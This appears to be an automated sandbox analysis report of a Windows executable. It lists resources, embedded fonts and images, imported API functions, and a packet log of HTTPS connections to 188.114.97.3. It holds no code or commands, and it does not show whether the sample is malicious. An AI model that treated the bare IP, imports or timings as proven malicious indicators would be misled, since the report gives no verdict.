RT_STRING | 0x2c4c84 | 0x37a | data | Czech | Czech Republic | 0.4348314606741573
RT_STRING | 0x2c5000 | 0x3b8 | data | German | Germany | 0.4054621848739496
RT_STRING | 0x2c53b8 | 0x2b8 | data | English | United States | 0.4482758620689655
RT_STRING | 0x2c5670 | 0x3b0 | data | French | France | 0.413135593220339
RT_STRING | 0x2c5a20 | 0x3b4 | data | Italian | Italy | 0.39556962025316456
RT_STRING | 0x2c5dd4 | 0x1c6 | data | Japanese | Japan | 0.7268722466960352
RT_STRING | 0x2c5f9c | 0x36a | data | Portuguese | Brazil | 0.4096109839816934
RT_STRING | 0x2c6308 | 0x384 | data | Russian | Russia | 0.44555555555555554
RT_STRING | 0x2c668c | 0x398 | data | Turkish | Turkey | 0.4380434782608696
RT_STRING | 0x2c6a24 | 0x394 | data | Ukrainian | Ukrain | 0.44868995633187775
RT_STRING | 0x2c6db8 | 0x388 | data | Kazakh | Kazakhstan | 0.4446902654867257
RT_STRING | 0x2c7140 | 0x3ec | data | Uzbek | Italy | 0.3934262948207171
RT_STRING | 0x2c752c | 0x12c | data | Chinese | China | 0.84
RT_STRING | 0x2c7658 | 0x380 | data | Portuguese | Portugal | 0.41629464285714285
RT_STRING | 0x2c79d8 | 0x376 | data |  |  | 0.41196388261851014
RT_STRING | 0x2c7d50 | 0x2bc | data | Chinese | Taiwan | 0.6614285714285715
                                                                                                                      RT_STRING0x2c800c0x7c2AmigaOS bitmap font "h", fc_YSize 29440, 17152 elements, 2nd "c", 3rd "e"CzechCzech Republic0.3252769385699899
                                                                                                                      RT_STRING0x2c87d00x94edataGermanGermany0.2959697732997481
                                                                                                                      RT_STRING0x2c91200x73edataEnglishUnited States0.307982740021575
                                                                                                                      RT_STRING0x2c98600x996dataFrenchFrance0.267318663406683
                                                                                                                      RT_STRING0x2ca1f80x87cdataItalianItaly0.2960405156537753
                                                                                                                      RT_STRING0x2caa740x4f8dataJapaneseJapan0.4693396226415094
                                                                                                                      RT_STRING0x2caf6c0x862dataPortugueseBrazil0.2996272134203169
                                                                                                                      RT_STRING0x2cb7d00x7b4dataRussianRussia0.32454361054766734
                                                                                                                      RT_STRING0x2cbf840x784dataTurkishTurkey0.32744282744282743
                                                                                                                      RT_STRING0x2cc7080x79edataUkrainianUkrain0.3374358974358974
                                                                                                                      RT_STRING0x2ccea80x7b4dataKazakhKazakhstan0.3235294117647059
                                                                                                                      RT_STRING0x2cd65c0x7f6dataUzbekItaly0.30372914622178604
                                                                                                                      RT_STRING0x2cde540x2bcdataChineseChina0.6614285714285715
                                                                                                                      RT_STRING0x2ce1100x876dataPortuguesePortugal0.3079409048938135
                                                                                                                      RT_STRING0x2ce9880x8fedata0.290616854908775
                                                                                                                      RT_STRING0x2cf2880x206dataChineseTaiwan0.7355212355212355
                                                                                                                      RT_STRING0x2cf4900x5aedataCzechCzech Republic0.33700137551581844
                                                                                                                      RT_STRING0x2cfa400x788dataGermanGermany0.3112033195020747
                                                                                                                      RT_STRING0x2d01c80x65adataEnglishUnited States0.2865928659286593
                                                                                                                      RT_STRING0x2d08240x6f4dataFrenchFrance0.29044943820224717
                                                                                                                      RT_STRING0x2d0f180x6aadataItalianItaly0.2995310668229777
                                                                                                                      RT_STRING0x2d15c40x3ecdataJapaneseJapan0.48904382470119523
                                                                                                                      RT_STRING0x2d19b00x680dataPortugueseBrazil0.30709134615384615
                                                                                                                      RT_STRING0x2d20300x66adataRussianRussia0.31242387332521315
                                                                                                                      RT_STRING0x2d269c0x668dataTurkishTurkey0.3207317073170732
                                                                                                                      RT_STRING0x2d2d040x666dataUkrainianUkrain0.3144078144078144
                                                                                                                      RT_STRING0x2d336c0x652dataKazakhKazakhstan0.31087762669962915
                                                                                                                      RT_STRING0x2d39c00x6ecdataUzbekItaly0.28724604966139955
                                                                                                                      RT_STRING0x2d40ac0x206dataChineseChina0.6833976833976834
                                                                                                                      RT_STRING0x2d42b40x6bedataPortuguesePortugal0.3238702201622248
                                                                                                                      RT_STRING0x2d49740x710data0.31692477876106195
                                                                                                                      RT_STRING0x2d50840x1ecdataChineseTaiwan0.5955284552845529
                                                                                                                      RT_STRING0x2d52700x3e4dataCzechCzech Republic0.3684738955823293
                                                                                                                      RT_STRING0x2d56540x4a8dataGermanGermany0.3313758389261745
                                                                                                                      RT_STRING0x2d5afc0x39edataEnglishUnited States0.3347732181425486
                                                                                                                      RT_STRING0x2d5e9c0x44cdataFrenchFrance0.3209090909090909
                                                                                                                      RT_STRING0x2d62e80x41cdataItalianItaly0.3155893536121673
                                                                                                                      RT_STRING0x2d67040x284dataJapaneseJapan0.5760869565217391
                                                                                                                      RT_STRING0x2d69880x40edataPortugueseBrazil0.3246628131021195
                                                                                                                      RT_STRING0x2d6d980x3d4dataRussianRussia0.3469387755102041
                                                                                                                      RT_STRING0x2d716c0x3fadataTurkishTurkey0.3605108055009823
                                                                                                                      RT_STRING0x2d75680x3dcdataUkrainianUkrain0.3431174089068826
                                                                                                                      RT_STRING0x2d79440x3eadataKazakhKazakhstan0.3852295409181637
                                                                                                                      RT_STRING0x2d7d300x43cdataUzbekItaly0.34501845018450183
                                                                                                                      RT_STRING0x2d816c0x1e2dataChineseChina0.6182572614107884
                                                                                                                      RT_STRING0x2d83500x41edataPortuguesePortugal0.33586337760910817
                                                                                                                      RT_STRING0x2d87700x44cdata0.30272727272727273
                                                                                                                      RT_STRING0x2d8bbc0x2e2dataChineseTaiwan0.6300813008130082
                                                                                                                      RT_STRING0x2d8ea00x6b6dataCzechCzech Republic0.3370197904540163
                                                                                                                      RT_STRING0x2d95580x7acdataGermanGermany0.319755600814664
                                                                                                                      RT_STRING0x2d9d040x6acdataEnglishUnited States0.3120608899297424
                                                                                                                      RT_STRING0x2da3b00x83cdataFrenchFrance0.2903225806451613
                                                                                                                      RT_STRING0x2dabec0x738dataItalianItaly0.3051948051948052
                                                                                                                      RT_STRING0x2db3240x400dataJapaneseJapan0.5126953125
                                                                                                                      RT_STRING0x2db7240x786dataPortugueseBrazil0.3047767393561786
                                                                                                                      RT_STRING0x2dbeac0x6d2dataRussianRussia0.3293241695303551
                                                                                                                      RT_STRING0x2dc5800x73edataTurkishTurkey0.3284789644012945
                                                                                                                      RT_STRING0x2dccc00x6bedataUkrainianUkrain0.33371958285052145
                                                                                                                      RT_STRING0x2dd3800x75adataKazakhKazakhstan0.3443145589798087
                                                                                                                      RT_STRING0x2ddadc0x74edataUzbekItaly0.31016042780748665
                                                                                                                      RT_STRING0x2de22c0x2e2dataChineseChina0.6246612466124661
                                                                                                                      RT_STRING0x2de5100x770dataPortuguesePortugal0.3182773109243697
                                                                                                                      RT_STRING0x2dec800x7c2data0.3016112789526687
                                                                                                                      RT_STRING0x2df4440x11edataChineseTaiwan0.6398601398601399
                                                                                                                      RT_STRING0x2df5640x2e6dataCzechCzech Republic0.38005390835579517
                                                                                                                      RT_STRING0x2df84c0x38edataGermanGermany0.31758241758241756
                                                                                                                      RT_STRING0x2dfbdc0x2bcdataEnglishUnited States0.3485714285714286
                                                                                                                      RT_STRING0x2dfe980x350dataFrenchFrance0.3290094339622642
                                                                                                                      RT_STRING0x2e01e80x2f2dataItalianItaly0.35013262599469497
                                                                                                                      RT_STRING0x2e04dc0x1e2dataJapaneseJapan0.5124481327800829
                                                                                                                      RT_STRING0x2e06c00x312dataPortugueseBrazil0.3460559796437659
                                                                                                                      RT_STRING0x2e09d40x2aedataRussianRussia0.3979591836734694
                                                                                                                      RT_STRING0x2e0c840x2d0dataTurkishTurkey0.3527777777777778
                                                                                                                      RT_STRING0x2e0f540x2c2dataUkrainianUkrain0.4192634560906516
                                                                                                                      RT_STRING0x2e12180x2a2dataKazakhKazakhstan0.42433234421364985
                                                                                                                      RT_STRING0x2e14bc0x2f0dataUzbekItaly0.375
                                                                                                                      RT_STRING0x2e17ac0x11edataChineseChina0.6398601398601399
                                                                                                                      RT_STRING0x2e18cc0x2f2dataPortuguesePortugal0.35145888594164454
                                                                                                                      RT_STRING0x2e1bc00x30edata0.34271099744245526
                                                                                                                      RT_FONTDIR0x2e1ed00x1cadata0.7183406113537117
                                                                                                                      RT_FONT0x2e209c0x35ad4TrueType Font data, digitally signed, 17 tables, 1st "DSIG", 32 names, Macintosh, Copyright (c) 2022 Commercial Type, Inc. All rights reserved.YS GeoRegularCommercialType,Inc.: Y0.3771718366233057
                                                                                                                      RT_FONT0x317b700x39410TrueType Font data, digitally signed, 17 tables, 1st "DSIG", 32 names, Macintosh, Copyright (c) 2022 Commercial Type, Inc. All rights reserved.YS GeoMediumCommercialType,Inc.: YS0.39718649791908306
                                                                                                                      RT_FONT0x350f800x2617cTrueType Font data, digitally signed, 15 tables, 1st "DSIG", 14 names, Microsoft, language 0x409, Copyright (c) 2022 Commercial Type, Inc. All rights reserved.YS TextRegular1.001;COMM;YSText-Reg0.4265388263644987
                                                                                                                      RT_RCDATA0x3770fc0x2d6PNG image data, 410 x 186, 8-bit colormap, non-interlaced0.7121212121212122
                                                                                                                      RT_RCDATA0x3773d40xfdPNG image data, 360 x 28, 8-bit/color RGBA, non-interlaced0.924901185770751
                                                                                                                      RT_RCDATA0x3774d40xecPNG image data, 360 x 28, 8-bit gray+alpha, non-interlaced0.9788135593220338
                                                                                                                      RT_RCDATA0x3775c00x28dPNG image data, 96 x 16, 8-bit/color RGBA, non-interlaced1.0168453292496171
                                                                                                                      RT_RCDATA0x3778500x4d8PNG image data, 192 x 32, 8-bit/color RGBA, non-interlaced1.0088709677419354
                                                                                                                      RT_RCDATA0x377d280x141f4JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 802x430, components 30.8583474884736715
                                                                                                                      RT_RCDATA0x38bf1c0x3bb9eJPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8223211438942437
                                                                                                                      RT_RCDATA0x3c7abc0x1e2f8JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 802x430, components 30.9196861857004206
                                                                                                                      RT_RCDATA0x3e5db40x4e14eJPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8874936683530213
                                                                                                                      RT_RCDATA0x433f040x1ce24JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 802x430, components 30.917309057713764
                                                                                                                      RT_RCDATA0x450d280x4a746JPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8811113370015018
                                                                                                                      RT_RCDATA0x49b4700x350PNG image data, 60 x 20, 8-bit/color RGBA, non-interlaced1.0129716981132075
                                                                                                                      RT_RCDATA0x49b7c00x5e5PNG image data, 120 x 40, 8-bit/color RGBA, non-interlaced1.0072895957587806
                                                                                                                      RT_RCDATA0x49bda80x99PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced0.9869281045751634
                                                                                                                      RT_RCDATA0x49be440x119PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced1.0213523131672597
                                                                                                                      RT_RCDATA0x49bf600x20cPNG image data, 60 x 20, 8-bit/color RGBA, non-interlaced1.0209923664122138
                                                                                                                      RT_RCDATA0x49c16c0x399PNG image data, 120 x 40, 8-bit/color RGBA, non-interlaced1.011943539630836
                                                                                                                      RT_RCDATA0x49c5080x71PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced0.9823008849557522
                                                                                                                      RT_RCDATA0x49c57c0x81PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced1.0
                                                                                                                      RT_RCDATA0x49c6000xc4PNG image data, 393 x 4, 8-bit/color RGBA, non-interlaced1.0051020408163265
                                                                                                                      RT_RCDATA0x49c6c40x11dPNG image data, 786 x 8, 8-bit/color RGBA, non-interlaced1.0035087719298246
                                                                                                                      RT_RCDATA0x49c7e40xcbPNG image data, 393 x 4, 8-bit/color RGBA, non-interlaced1.0147783251231528
                                                                                                                      RT_RCDATA0x49c8b00x129PNG image data, 786 x 8, 8-bit/color RGBA, non-interlaced0.9966329966329966
                                                                                                                      RT_RCDATA0x49c9dc0x176d3PNG image data, 802 x 430, 8-bit/color RGBA, non-interlaced0.9820436663019123
                                                                                                                      RT_RCDATA0x4b40b00x53b14PNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9734192133113966
                                                                                                                      RT_RCDATA0x507bc40x19747PNG image data, 802 x 430, 8-bit/color RGBA, non-interlaced0.9873301171076988
                                                                                                                      RT_RCDATA0x52130c0x4fe3dPNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9762826644337758
                                                                                                                      RT_RCDATA0x57114c0x19365PNG image data, 802 x 430, 8-bit/color RGBA, non-interlaced0.9881571429954779
                                                                                                                      RT_RCDATA0x58a4b40x4f7f2PNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9764263646358616
                                                                                                                      RT_RCDATA0x5d9ca80x2b4PNG image data, 460 x 234, 8-bit/color RGB, non-interlaced0.18641618497109827
                                                                                                                      RT_RCDATA0x5d9f5c0x23bPNG image data, 300 x 35, 8-bit/color RGBA, non-interlaced0.9929947460595446
                                                                                                                      RT_RCDATA0x5da1980x4f3PNG image data, 600 x 70, 8-bit/color RGBA, non-interlaced0.9344909234411997
                                                                                                                      RT_RCDATA0x5da68c0x23ePNG image data, 300 x 35, 8-bit/color RGBA, non-interlaced1.0
                                                                                                                      RT_RCDATA0x5da8cc0x4fcPNG image data, 600 x 70, 8-bit/color RGBA, non-interlaced0.9365203761755486
                                                                                                                      RT_RCDATA0x5dadc80x154PNG image data, 60 x 20, 8-bit/color RGBA, non-interlaced1.026470588235294
                                                                                                                      RT_RCDATA0x5daf1c0x2c7PNG image data, 120 x 40, 8-bit/color RGBA, non-interlaced0.9817158931082982
                                                                                                                      RT_RCDATA0x5db1e40x3ebPNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced1.0109670987038883
                                                                                                                      RT_RCDATA0x5db5d00x491PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced1.009409751924722
                                                                                                                      RT_RCDATA0x5dba640x440PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced1.010110294117647
                                                                                                                      RT_RCDATA0x5dbea40x463PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced1.0097951914514693
                                                                                                                      RT_RCDATA0x5dc3080xe8PNG image data, 18 x 400, 8-bit/color RGBA, non-interlaced0.6422413793103449
                                                                                                                      RT_RCDATA0x5dc3f00xd8PNG image data, 852 x 18, 8-bit/color RGBA, non-interlaced0.9212962962962963
                                                                                                                      RT_RCDATA0x5dc4c80xecPNG image data, 18 x 400, 8-bit/color RGBA, non-interlaced0.635593220338983
                                                                                                                      RT_RCDATA0x5dc5b40xdfPNG image data, 852 x 18, 8-bit/color RGBA, non-interlaced0.905829596412556
                                                                                                                      RT_RCDATA0x5dc6940xadPNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced1.0057803468208093
                                                                                                                      RT_RCDATA0x5dc7440xbePNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced1.0157894736842106
                                                                                                                      RT_RCDATA0x5dc8040xcaPNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced1.0247524752475248
                                                                                                                      RT_RCDATA0x5dc8d00xbbPNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced1.0213903743315509
                                                                                                                      RT_RCDATA0x5dc98c0x15fPNG image data, 18 x 464, 8-bit/color RGBA, non-interlaced0.7578347578347578
                                                                                                                      RT_RCDATA0x5dcaec0x13ePNG image data, 916 x 18, 8-bit/color RGBA, non-interlaced0.9716981132075472
                                                                                                                      RT_RCDATA0x5dcc2c0x156PNG image data, 18 x 464, 8-bit/color RGBA, non-interlaced0.7426900584795322
                                                                                                                      RT_RCDATA0x5dcd840x134PNG image data, 916 x 18, 8-bit/color RGBA, non-interlaced0.974025974025974
                                                                                                                      RT_RCDATA0x5dceb80x495PNG image data, 420 x 48, 8-bit/color RGBA, non-interlaced0.9411764705882353
                                                                                                                      RT_RCDATA0x5dd3500x619PNG image data, 160 x 22, 8-bit/color RGBA, non-interlaced1.0070467648942985
                                                                                                                      RT_RCDATA0x5dd96c0xd0ePNG image data, 320 x 40, 8-bit/color RGBA, non-interlaced1.0032914422501495
                                                                                                                      RT_RCDATA0x5de67c0x61dPNG image data, 160 x 22, 8-bit/color RGBA, non-interlaced1.0070287539936102
RT_GROUP_ICON | 0x995afc | 0x5a | data | 0.7444444444444445
RT_VERSION | 0x995b58 | 0x488 | data | English | United States | 0.43448275862068964
RT_MANIFEST | 0x995fe0 | 0x4ae | XML 1.0 document, ASCII text, with very long lines (1084) | English | United States | 0.5058430717863105
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, AssignProcessToJobObject, CloseHandle, CompareStringW, CopyFileW, CreateDirectoryW, CreateEventA, CreateEventW, CreateFileMappingW, CreateFileW, CreateMutexW, CreateProcessW, CreateThread, CreateToolhelp32Snapshot, DecodePointer, DeleteCriticalSection, DeleteFileW, DeleteProcThreadAttributeList, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FindResourceExW, FindResourceW, FlushFileBuffers, FormatMessageA, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDateFormatW, GetDiskFreeSpaceExW, GetDriveTypeW, GetEnvironmentStringsW, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesExW, GetFileAttributesW, GetFileInformationByHandle, GetFileSize, GetFileSizeEx, GetFileType, GetFullPathNameW, GetGeoInfoW, GetLastError, GetLocalTime, GetLocaleInfoW, GetLogicalDriveStringsW, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOEMCP, GetProcAddress, GetProcessHeap, GetProcessId, GetProductInfo, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempFileNameW, GetTempPathW, GetThreadPriority, GetTickCount, GetTimeFormatW, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultLangID, GetUserDefaultUILanguage, GetUserGeoID, GetVersionExW, GetWindowsDirectoryW, GlobalAlloc, GlobalFree, GlobalLock, GlobalUnlock, HeapAlloc, HeapFree, InitOnceExecuteOnce, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeProcThreadAttributeList, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, IsWow64Process, K32GetMappedFileNameW, K32GetProcessMemoryInfo, LCMapStringW, LeaveCriticalSection, LoadLibraryExA, LoadLibraryExW, LoadLibraryW, LoadResource, LocalFree, LockFile, LockResource, MapViewOfFile, MoveFileExW, MoveFileW, MultiByteToWideChar, OpenEventA, OpenEventW, OpenProcess, OutputDebugStringA, OutputDebugStringW, Process32FirstW, Process32NextW, QueryDosDeviceW, QueryPerformanceCounter, QueryPerformanceFrequency, QueryThreadCycleTime, QueryUnbiasedInterruptTime, RaiseException, ReOpenFile, ReadConsoleW, ReadFile, ReleaseMutex, ReleaseSRWLockExclusive, RemoveDirectoryW, ReplaceFileW, ResetEvent, RtlCaptureStackBackTrace, RtlUnwind, SetDllDirectoryW, SetEndOfFile, SetEnvironmentVariableW, SetEvent, SetFileAttributesW, SetFilePointer, SetFilePointerEx, SetHandleInformation, SetLastError, SetStdHandle, SetThreadPriority, SetUnhandledExceptionFilter, SizeofResource, Sleep, SleepConditionVariableSRW, SystemTimeToTzSpecificLocalTime, TerminateProcess, TerminateThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, UnlockFile, UnmapViewOfFile, UpdateProcThreadAttribute, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, VirtualQueryEx, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile, lstrcmpA, lstrcpynW, lstrlenW
OLEACC.dll | AccessibleObjectFromWindow, LresultFromObject
Name | Ordinal | Address
GetHandleVerifier | 1 | 0x4a8670
Language of compilation system | Country where language is spoken
Chinese | Taiwan
Czech | Czech Republic
German | Germany
English | United States
French | France
Italian | Italy
Japanese | Japan
Portuguese | Brazil
Russian | Russia
Turkish | Turkey
Ukrainian | Ukraine
Kazakh | Kazakhstan
Chinese | China
Portuguese | Portugal
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Jun 1, 2024 17:42:04.129300117 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129332066 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129352093 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129389048 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.129389048 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.129389048 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.129399061 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129522085 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.129540920 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.129795074 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.243433952 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.243513107 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.243542910 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.244507074 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.244507074 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.244524002 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.248516083 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.254582882 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254663944 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254693985 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254719019 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254735947 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.254746914 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254826069 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.254826069 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.254826069 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.255002022 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.256515026 CEST49709443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.256545067 CEST44349709188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.376463890 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.376502991 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.378571033 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.378571033 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.378624916 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.988820076 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990160942 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:04.990191936 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.990210056 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.990220070 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:04.990226984 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:05.377907038 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:05.378036976 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:05.378050089 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:05.378081083 CEST44349710188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:05.378110886 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:05.378218889 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:05.378218889 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:05.378218889 CEST49710443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:06.612850904 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:06.612914085 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:06.613009930 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:06.613226891 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:06.613241911 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.212759018 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.212923050 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213341951 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213354111 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.213532925 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213546991 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.213630915 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213646889 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.213684082 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.213686943 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.606257915 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.606328011 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.606337070 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.606394053 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.606455088 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.606477976 CEST44349711188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:07.606506109 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:07.606527090 CEST49711443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:08.748660088 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:08.748692036 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:08.748775959 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:08.749193907 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:08.749209881 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.357518911 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.357686996 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358241081 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358247995 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.358442068 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358448029 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.358608007 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358624935 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.358738899 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.358745098 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.733045101 CEST44349712188.114.97.3192.168.2.10
